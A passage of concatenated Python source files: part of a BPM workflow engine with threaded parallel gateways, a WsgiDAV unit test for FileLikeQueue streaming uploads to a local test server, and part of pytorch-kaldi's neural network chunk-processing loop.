super(BpmInstance,self).__init__(parent,spec,context,tokenManager,exp)
def start(self,parent=None):
self._status='running'
starts = dict(filter(lambda p: p[1].kind == 'start', self._spec.nodes.items()))
target=None
for name in starts:
p = starts[name]
if p.expression != None:
if self.exp.eval(p.expression,self._context):
target= name
break
else:
target= name
break
if target == None: raise ProcessError('not found start node enabled')
token=self.tokenManager.create(process=self._spec.name,parent=parent,node=target)
self.execute(token)
def stop(self):
self._status='stopping'
def pause(self):
self._status='pausing'
def execute(self,token):
if self._status=='running':
node=self._spec.nodes[token.node]
# self._context['__current']={'name':node.name ,'kind': node.kind }
if node.kind == 'start': self.nextNode(node,token)
elif node.kind == 'task': self.executeTask(node,token)
elif node.kind == 'end': self.executeEnd(node,token)
elif node.kind == 'exclusiveGateway':self.nextNode(node,token)
elif node.kind == 'inclusiveGateway':self.executeInclusiveGateway(node,token)
elif node.kind == 'parallelGateway':self.executeParallelGateway(node,token)
else: raise ProcessError('not found node kind :'+node.kind)
# self._context['__last']={'name':node.name ,'kind': node.kind}
elif self._status=='pausing':
self._status='paused'
elif self._status=='stopping':
self._status='stopped'
def executeEnd(self,node,token):
token=self.tokenManager.update(token,{'status':'end'})
def executeTask(self,node,token):
try:
self.exp.eval(node.expression,self._context)
except Exception as ex:
print(ex)
raise
self.nextNode(node,token)
def executeInclusiveGateway(self,node,token):
subToken=False
pending = False
if len(node.entries) > 1:
if token.parentId != None:
childs = self.tokenManager.getChilds(token.parentId)
subToken=True
token=self.tokenManager.update(token,{'status':'end'})
for child in childs:
if child.id != token.id and child.status != 'end':
pending=True
break
if subToken:
if pending: return
else:
parent = self.tokenManager.get(token.parentId)
parent = self.tokenManager.deleteChilds(parent)
token = parent
targets=self.getTargets(node,onlyFirst=False)
if len(targets) == 1:
token=self.tokenManager.update(token,{'node':targets[0],'status':'ready'})
self.execute(token)
else:
for target in targets:
child=self.tokenManager.create(process=self._spec.name,parent=token,node=target)
token.childs.append(child)
token=self.tokenManager.update(token,{'childs':token.childs,'status':'await'})
for child in token.childs:
self.execute(child)
# https://stackoverflow.com/questions/7207309/how-to-run-functions-in-parallel
# https://stackoverflow.com/questions/1559125/string-arguments-in-python-multiprocessing
def executeParallelGateway(self,node,token):
subToken=False
pending = False
if len(node.entries) > 1:
if token.parentId != None:
childs = self.tokenManager.getChilds(token.parentId)
if len(childs) > 1 :
subToken=True
token=self.tokenManager.update(token,{'status':'end'})
token.thread.join()
for child in childs:
if child.id != token.id and child.status != 'end':
pending=True
break
if subToken:
if pending: return
else:
parent = self.tokenManager.get(token.parentId)
parent = self.tokenManager.deleteChilds(parent)
token=parent
targets=self.getTargets(node,onlyFirst=False)
if len(targets) == 1:
token=self.tokenManager.update(token,{'node':targets[0],'status':'ready'})
self.execute(token)
else:
for target in targets:
child=self.tokenManager.create(process=self._spec.name,parent=token,node=target)
thread = ParallelProcess(target=self.execute, args=(child,))
child=self.tokenManager.update(child,{'thread':thread})
token.childs.append(child)
token=self.tokenManager.update(token,{'childs':token.childs,'status':'await'})
for child in token.childs:
child.thread.start()
def nextNode(self,node,token):
targets=self.getTargets(node)
token=self.tokenManager.update(token,{'node':targets[0] })
self.execute(token)
def getTargets(self,node,onlyFirst=True):
targets=[]
for p in node.transition:
if p.expression != None:
if self.exp.eval(p.expression,self._context):
targets.append(p.target)
if onlyFirst:break
else:
targets.append(p.target)
if onlyFirst:break
if len(targets) == 0:
raise ProcessError('node '+node.name+' not found targets')
return targets
class ProcessInstanceFactory():
def __init__(self,tokenManager:TokenManager,exp:Exp):
self.tokenManager = tokenManager
self.exp = exp
def create(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
pass
class BpmInstanceFactory(ProcessInstanceFactory):
def __init__(self,tokenManager:TokenManager,exp:Exp):
super(BpmInstanceFactory,self).__init__(tokenManager,exp)
def create(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
return BpmInstance(parent,spec,context,self.tokenManager,self.exp)
class Process(metaclass=Singleton):
def __init__(self):
self._parsers={}
self._instanceFactory={}
self._specs={}
self._instances= {}
self.exp= Exp()
self.tokenManager = TokenManager()
self.init()
def init(self):
self.addParser('bpm',BpmParser)
self.addInstanceFactory('bpm',BpmInstanceFactory)
def addParser(self,key:str,parser:ProcessParser):
self._parsers[key] = parser(self.exp)
def addInstanceFactory(self,key:str,factory:ProcessInstanceFactory):
self._instanceFactory[key] = factory(self.tokenManager,self.exp)
def AddSpec(self,key:str,spec:dict)-> ProcessSpec:
processSpec =self.parse(key,spec)
self._specs[key] =processSpec
return processSpec
def parse(self,key:str,spec:dict)-> ProcessSpec:
spec['name'] = key
kind =spec['kind']
if kind not in self._parsers: raise ProcessError('not found parser kind :'+kind)
return self._parsers[kind].parse(spec)
def createInstance(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
if spec.kind not in self._instanceFactory: raise ProcessError('not found instance factory kind :'+spec.kind)
instance=self._instanceFactory[spec.kind].create(spec,context,parent)
instance.id = str(uuid.uuid4())
return instance
def create(self,key:str,context:dict,parent=None)-> ProcessInstance:
spec=self._specs[key]
return self.createInstance(spec,context,parent)
# https://www.genbeta.com/desarrollo/multiprocesamiento-en-python-threads-a-fondo-introduccion
# https://rico-schmidt.name/pymotw-3/threading/
def start(self,instance:ProcessInstance,sync=False):
try:
thread = threading.Thread(target=self._process_start, args=(instance,))
self._instances[instance.id]= {"instance":instance,"thread":thread }
if not sync: thread.setDaemon(True)
thread.start()
if sync: thread.join()
except Exception as ex:
print(ex)
raise
def stop(self,id):
self._instances[id]['instance'].stop()
def pause(self,id):
self._instances[id]['instance'].pause()
def _process_start(self,instance:ProcessInstance):
instance.start()
def getInstance(self,id)->ProcessInstance:
return self._instances[id]
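# Illustrative usage sketch (added; the 'invoice' spec dict and context are hypothetical):
#   process = Process()
#   process.AddSpec('invoice', {'kind': 'bpm', 'nodes': {...}})   # parsed by BpmParser
#   instance = process.create('invoice', context={'total': 0})
#   process.start(instance, sync=True)   # BpmInstance.start() runs in a worker thread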
|
test_streaming.py
|
# -*- coding: utf-8 -*-
# (c) 2009-2021 Martin Wendt and contributors; see WsgiDAV https://github.com/mar10/wsgidav
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
"""
Unit tests for wsgidav.stream_tools.FileLikeQueue
"""
import os
import threading
import unittest
from tempfile import gettempdir
import requests
from tests.util import Timing, WsgiDavTestServer, write_test_file
from wsgidav import util
from wsgidav.dav_provider import DAVNonCollection, DAVProvider
from wsgidav.stream_tools import FileLikeQueue
# ----------------------------------------------------------------------------
# Dummy DAVProvider implementation
#
# Note that this code runs in a separated process, spawned by the unit tests.
class MockProxyResource(DAVNonCollection):
"""
A simple _DAVResource that handles PUT requests by passing a FileLikeQueue
to the server and asynchronously pipes the incoming data stream to a target
file.
"""
def __init__(self, path, environ, target_path):
super().__init__(path, environ)
self.target_path = target_path
self.worker = None
def get_content(self): # Keep ABC happy
raise NotImplementedError
def get_content_length(self): # Keep ABC happy
raise NotImplementedError
def get_etag(self):
return None
def support_etag(self):
return False
def begin_write(self, *, content_type=None):
# print("begin_write: {}".format(self.target_path))
queue = FileLikeQueue(max_size=1)
# Simulate an asynchronous consumer. We use a file, so we can check
# the result from the parent unittest process. In real life this could be
# requests.post(..., data=queue), ...
def _consumer():
# print("_consumer: {}".format(self.target_path))
with open(self.target_path, "wb") as f:
s = 0
# print("_consumer: read()...")
data = queue.read()
while data:
s += len(data)
# print("_consumer: read(): write")
f.write(util.to_bytes(data))
data = queue.read()
# print("_consumer(): done", s)
self.worker = threading.Thread(target=_consumer)
self.worker.setDaemon(True)
self.worker.start()
return queue
def end_write(self, *, with_errors):
print("end_write: {}".format(self.target_path))
self.worker.join()
class MockProxyProvider(DAVProvider):
"""
A simple DAVProvider that returns a dummy MockProxyResource for all requests.
"""
def __init__(self, target_path):
super().__init__()
self.target_path = target_path
def get_resource_inst(self, path, environ):
print("get_resource_inst", path)
res = MockProxyResource(path, environ, self.target_path)
if path == "/": # if server asks for the parent collection, fake one
res.is_collection = True
return res
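# Added sketch (assumption; the upstream URL is a placeholder): instead of the
# file-writing consumer in begin_write(), the same FileLikeQueue could be streamed
# to another server, in the spirit of the requests.post(..., data=queue) idea
# mentioned above:
#   threading.Thread(target=requests.post,
#                    args=("http://upstream.example/upload",),
#                    kwargs={"data": queue}, daemon=True).start()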
# ========================================================================
# BasicTest
# ========================================================================
class BasicTest(unittest.TestCase):
def setUp(self):
self.SIZE = 10 * 1000 * 1000
self.test_file = write_test_file("source.txt", self.SIZE)
self.target_path = os.path.join(gettempdir(), "target.txt")
self.provider = MockProxyProvider(self.target_path)
def tearDown(self):
os.remove(self.test_file)
if os.path.isfile(self.target_path):
os.remove(self.target_path)
self.provider = None
def testFileLikeQueueUnsized(self):
# queue of unlimited size
q = FileLikeQueue()
q.write(b"*" * 42)
q.write(b"*" * 3)
# unsized reads will return chunks as queued
res = q.read()
self.assertEqual(len(res), 42)
res = q.read()
self.assertEqual(len(res), 3)
q.close() # subsequent reads will return "" instead of blocking
res = q.read()
self.assertEqual(res, b"", "Read after close() returns ''")
# subsequent write will raise
self.assertRaises(ValueError, q.write, b"***")
def testFileLikeQueue(self):
# queue of unlimited size
q = FileLikeQueue()
# queue 32 bytes
q.write(b"*" * 7)
q.write(b"*" * 11)
q.write(b"*" * 5)
q.write(b"*" * 9)
q.close()
# sized reads will return chunks as demanded
for _ in range(6):
self.assertEqual(len(q.read(5)), 5)
self.assertEqual(len(q.read(5)), 2, "last chunk delivers the reminder")
self.assertEqual(len(q.read(5)), 0, "further read() returns ''")
# self.assertEqual(q.size, 0)
def testFileLikeQueueAll(self):
# queue of unlimited size
q = FileLikeQueue()
# queue 32 bytes
q.write(b"*" * 7)
q.write(b"*" * 11)
q.write(b"*" * 5)
q.write(b"*" * 9)
q.close()
# read(-1) returns all, then ''
self.assertEqual(len(q.read(-1)), 32)
self.assertEqual(len(q.read(-1)), 0)
def testStream(self):
with WsgiDavTestServer(provider=self.provider):
with Timing("testStream", self.SIZE):
with open(self.test_file, "rb") as f:
r = requests.put("http://127.0.0.1:8080/bar.txt", data=f)
self.assertEqual(r.status_code, 204)
self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# def testStreamBlob(self):
# with WsgiDavTestServer(provider=self.provider):
# with Timing("testStream", self.SIZE):
# blob = b"*" * self.SIZE
# r = requests.put("http://127.0.0.1:8080/bar.txt", data=blob)
# self.assertEqual(r.status_code, 204)
# self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# def testStreamChunked(self):
# with WsgiDavTestServer(provider=self.provider):
# with Timing("testStream", self.SIZE):
# def _print_url(r, *args, **kwargs):
# print(r.url)
# def _generate():
# with open(self.test_file, "rb") as f:
# while True:
# out = f.read(1000*1000)
# if not out:
# break
# yield out
# r = requests.put("http://127.0.0.1:8080/bar.txt",
# data=_generate(),
# # headers={"Content-Length": str(self.SIZE)},
# hooks=dict(response=_print_url))
# self.assertEqual(r.status_code, 204)
# self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# ========================================================================
if __name__ == "__main__":
unittest.main()
|
core.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import sys
import configparser
import os
from utils import is_sequential_dict, model_init, optimizer_init, forward_model, progress
from data_io import load_counts
import numpy as np
import random
import torch
from distutils.util import strtobool
import time
import threading
from data_io import read_lab_fea, open_or_fd, write_mat
from utils import shift
def read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process
):
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
if wait_for_process:
p.join()
return None
else:
return p
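# Illustrative usage sketch (added), mirroring how run_nn_refac01 below prefetches
# the next chunk while the current one is being processed:
#   shared_list = list()
#   p = read_next_chunk_into_shared_list_with_subprocess(
#       read_lab_fea, shared_list, next_config_file, is_production, output_folder,
#       wait_for_process=False)
#   # ... train on the current chunk ...
#   p.join()   # then unpack shared_list with extract_data_from_shared_list()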
def extract_data_from_shared_list(shared_list):
data_name = shared_list[0]
data_end_index_fea = shared_list[1]
data_end_index_lab = shared_list[2]
fea_dict = shared_list[3]
lab_dict = shared_list[4]
arch_dict = shared_list[5]
data_set = shared_list[6]
return data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set
def convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda):
if not (save_gpumem) and use_cuda:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float().cuda()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float().cuda()
else:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float()
data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
return data_set_inp, data_set_ref
def run_nn_refac01(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
def _read_chunk_specific_config(cfg_file):
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _get_batch_size_from_config(config, to_do):
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
elif to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
elif to_do == "forward":
batch_size = 1
return batch_size
def _initialize_random_seed(config):
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
def _load_model_and_optimizer(fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do):
inp_out_dict = fea_dict
nns, costs = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
optimizers = optimizer_init(nns, config, arch_dict)
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
if net in optimizers:
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
return nns, costs, optimizers, inp_out_dict
def _open_forward_output_files_and_get_file_handles(forward_outs, require_decodings, info_file, output_folder):
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
return post_file
def _get_batch_config(data_set_input, seq_model, to_do, data_name, batch_size):
N_snt = None
N_ex_tr = None
N_batches = None
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set_input.shape[0]
N_batches = int(N_ex_tr / batch_size)
return N_snt, N_ex_tr, N_batches
def _prepare_input(
snt_index,
batch_size,
inp_dim,
ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
):
def _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
):
def _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
if N_zeros_fea == N_zeros_lab:
return True
return False
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
N_zeros_fea = max_len_fea - snt_len_fea
N_zeros_lab = max_len_lab - snt_len_lab
if _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
N_zeros_fea_left = random.randint(0, N_zeros_fea)
N_zeros_lab_left = N_zeros_fea_left
else:
N_zeros_fea_left = 0
N_zeros_lab_left = 0
inp[N_zeros_fea_left : N_zeros_fea_left + snt_len_fea, k, :] = data_set_inp[
beg_snt_fea : beg_snt_fea + snt_len_fea, :
]
ref[N_zeros_lab_left : N_zeros_lab_left + snt_len_lab, k, :] = data_set_ref[
beg_snt_lab : beg_snt_lab + snt_len_lab, :
]
return inp, ref, snt_len_fea, snt_len_lab
if len(data_set_ref.shape) == 1:
data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
max_len_fea = 0
max_len_lab = 0
snt_len_fea = 0
snt_len_lab = 0
if seq_model:
max_len_fea = int(max(arr_snt_len_fea[snt_index : snt_index + batch_size]))
max_len_lab = int(max(arr_snt_len_lab[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len_fea, batch_size, inp_dim).contiguous()
ref = torch.zeros(max_len_lab, batch_size, ref_dim).contiguous()
for k in range(batch_size):
inp, ref, snt_len_fea, snt_len_lab = _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
)
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
else:
if to_do != "forward":
inp = data_set_inp[beg_batch:end_batch, :].contiguous()
ref = data_set_ref[beg_batch:end_batch, :].contiguous()
else:
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
inp = data_set_inp[beg_snt_fea : beg_snt_fea + snt_len_fea, :].contiguous()
ref = data_set_ref[beg_snt_lab : beg_snt_lab + snt_len_lab, :].contiguous()
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
if use_cuda:
inp = inp.cuda()
ref = ref.cuda()
return inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index
def _optimization_step(optimizers, outs_dict, config, arch_dict):
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
def _update_progress_bar(to_do, i, N_batches, loss_sum):
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
def _write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk):
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
def _save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict):
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
if net in optimizers:
checkpoint["optimizer_par"] = optimizers[net].state_dict()
else:
checkpoint["optimizer_par"] = dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
def _get_dim_from_data_set(data_set_inp, data_set_ref):
inp_dim = data_set_inp.shape[1]
ref_dim = 1
if len(data_set_ref.shape) > 1:
ref_dim = data_set_ref.shape[1]
return inp_dim, ref_dim
from data_io import read_lab_fea_refac01 as read_lab_fea
from utils import forward_model_refac01 as forward_model
config = _read_chunk_specific_config(cfg_file)
_initialize_random_seed(config)
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
batch_size = _get_batch_size_from_config(config, to_do)
if processed_first:
shared_list = list()
p = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process=True
)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
else:
data_set_inp = data_set["input"]
data_set_ref = data_set["ref"]
data_end_index_fea = data_end_index["fea"]
data_end_index_lab = data_end_index["lab"]
shared_list = list()
data_loading_process = None
if not next_config_file is None:
data_loading_process = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, next_config_file, is_production, output_folder, wait_for_process=False
)
nns, costs, optimizers, inp_out_dict = _load_model_and_optimizer(
fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do
)
if to_do == "forward":
post_file = _open_forward_output_files_and_get_file_handles(
forward_outs, require_decodings, info_file, output_folder
)
seq_model = is_sequential_dict(config, arch_dict)
N_snt, N_ex_tr, N_batches = _get_batch_config(data_set_inp, seq_model, to_do, data_name, batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt_fea = 0
beg_snt_lab = 0
arr_snt_len_fea = shift(shift(data_end_index_fea, -1, 0) - data_end_index_fea, 1, 0)
arr_snt_len_lab = shift(shift(data_end_index_lab, -1, 0) - data_end_index_lab, 1, 0)
arr_snt_len_fea[0] = data_end_index_fea[0]
arr_snt_len_lab[0] = data_end_index_lab[0]
data_set_inp_dim, data_set_ref_dim = _get_dim_from_data_set(data_set_inp, data_set_ref)
inp_dim = data_set_inp_dim + data_set_ref_dim
loss_sum = 0
err_sum = 0
start_time = time.time()
for i in range(N_batches):
inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index = _prepare_input(
snt_index,
batch_size,
data_set_inp_dim,
data_set_ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
)
if to_do == "train":
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
_optimization_step(optimizers, outs_dict, config, arch_dict)
else:
with torch.no_grad():
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
beg_batch = end_batch
end_batch = beg_batch + batch_size
_update_progress_bar(to_do, i, N_batches, loss_sum)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
del inp, ref, outs_dict, data_set_inp_dim, data_set_ref_dim
_save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
_write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk)
if not data_loading_process is None:
data_loading_process.join()
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {"input": data_set_inp, "ref": data_set_ref}
data_end_index = {"fea": data_end_index_fea, "lab": data_end_index_lab}
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
else:
return [None, None, None, None, None, None]
def run_nn(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
# This function processes the current chunk using the information in cfg_file. In parallel, the next chunk is loaded into CPU memory.
# Reading chunk-specific cfg file (first argument-mandatory file)
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Setting torch seed
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
# Reading config parameters
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
gpu_id = config["exp"]["gpu_id"]
multi_gpu = strtobool(config["exp"]["multi_gpu"])
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
if to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
if to_do == "forward":
batch_size = 1
# set gpu id
if use_cuda:
        torch.cuda.set_device(int(gpu_id))
torch.cuda.current_device()
# ***** Reading the Data********
if processed_first:
# Reading all the features and labels for this chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
# Reading all the features and labels for the next chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(next_config_file, is_production, shared_list, output_folder))
p.start()
# Reading model and initialize networks
inp_out_dict = fea_dict
[nns, costs] = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
# optimizers initialization
optimizers = optimizer_init(nns, config, arch_dict)
# pre-training and multi-gpu init
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
if to_do == "forward":
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
# check automatically if the model is sequential
seq_model = is_sequential_dict(config, arch_dict)
# ***** Minibatch Processing loop********
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set.shape[0]
N_batches = int(N_ex_tr / batch_size)
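    # e.g. with 1000 examples and batch_size 128, N_batches = int(1000 / 128) = 7; the trailing remainder of the chunk is not used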
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt = 0
start_time = time.time()
# array of sentence lengths
arr_snt_len = shift(shift(data_end_index, -1, 0) - data_end_index, 1, 0)
arr_snt_len[0] = data_end_index[0]
loss_sum = 0
err_sum = 0
inp_dim = data_set.shape[1]
for i in range(N_batches):
max_len = 0
if seq_model:
max_len = int(max(arr_snt_len[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len, batch_size, inp_dim).contiguous()
for k in range(batch_size):
snt_len = data_end_index[snt_index] - beg_snt
N_zeros = max_len - snt_len
                # Appending a random number of initial zeros; the others go at the end.
N_zeros_left = random.randint(0, N_zeros)
# randomizing could have a regularization effect
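                # e.g. with max_len = 10 and snt_len = 7, N_zeros = 3 and the sentence starts at a random offset in [0, 3]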
inp[N_zeros_left : N_zeros_left + snt_len, k, :] = data_set[beg_snt : beg_snt + snt_len, :]
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
else:
# features and labels for batch i
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len = data_end_index[snt_index] - beg_snt
inp = data_set[beg_snt : beg_snt + snt_len, :].contiguous()
beg_snt = data_end_index[snt_index]
